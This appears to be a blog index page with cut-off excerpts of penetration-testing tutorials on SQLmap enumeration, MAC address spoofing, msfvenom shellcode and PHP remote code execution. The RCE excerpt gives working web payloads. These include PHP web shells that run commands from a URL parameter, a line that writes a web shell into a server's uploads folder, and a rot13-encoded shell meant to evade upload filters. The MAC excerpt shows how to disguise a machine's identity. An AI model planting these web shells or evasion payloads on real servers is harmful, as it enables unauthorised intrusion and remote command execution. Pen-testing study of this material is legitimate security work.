[ Pen Testing ] :: Step by Step: Database Enumeration

Hacking in the dark

Database Enumeration Enumeration With SQLmap SQLmap is noisy as hell. Here is the official options/examples page: https://github.com/sqlmapproject/sqlmap/wiki/Usage. For example, save a captured header as an input file for SQLmap: Load HTTP request from a file Option: -r One of the possibilities of sqlmap is loading of raw HTTP request from a textual file. That way …

[ Pen Testing ] :: Step by Step: Changing Your MAC Address

macchanger

Hide Your Ass, Change Your MAC Manually ifconfig wlan0 down ifconfig ​wlan0 hw ether f1:a7:12:34:1b:c1 ifconfig wlan0 up With macchanger ifconfig wlan0 down # print your MAC macchanger -s wlan0​ # set your MAC macchanger -m 11:22:33:44:55:66 wlan0 # set to a random vendor, random ID macchanger -A wlan0 # set to your physical vender, …

[ Pen Testing ] :: Step by Step: msfvenom

Msfvenom creates shellcode from within Bash. Here is Rapid7’s own excellent documentation: https://github.com/rapid7/metasploit-fraamework/wiki/How-to-use-msfvenom “Complete How to Guide for MSFvenom”: https://securitytraning.com/complete-guide-msfvenom/ And a good thorough walk-through (in Spanish, but with regular English command examples): https://www.hackplayers.com/2018/05/recopilacion-shells-en-windows.html Open Bash and enter: msfvenom to get a syntax page. View a list of payloads: msfvenom -l payloads Create the reverse …

[ Pen Testing ] :: Step by Step: Remote Code Execution (RCE)

Glenn Norman hacking

Remote Code Execution RCE PHP RCE Test a form for vulnerability to PHP RCE: <?php phpinfo(); ?> Get a remote PHP shell: <?php system($_GET[“c”]); ?> <?php `$_GET[“c”]`; ?> Upload a file: <?php file_put_contents(‘/var/www/html/uploads/test.php’, ‘<?php system($_GET[“c”]);?>’); ?> Evade file-type upload filters using rot13 + urlencode: <?php $payload=”%3C%3Fcuc%20flfgrz%28%24_TRG%5Bp%5D%29%3B%3F%3E”; file_put_contents(‘/var/www/html/uploads/testfile.php’, str_rot13(urldecode($payload))); ?> RCE via webshell Pentest Monkey has …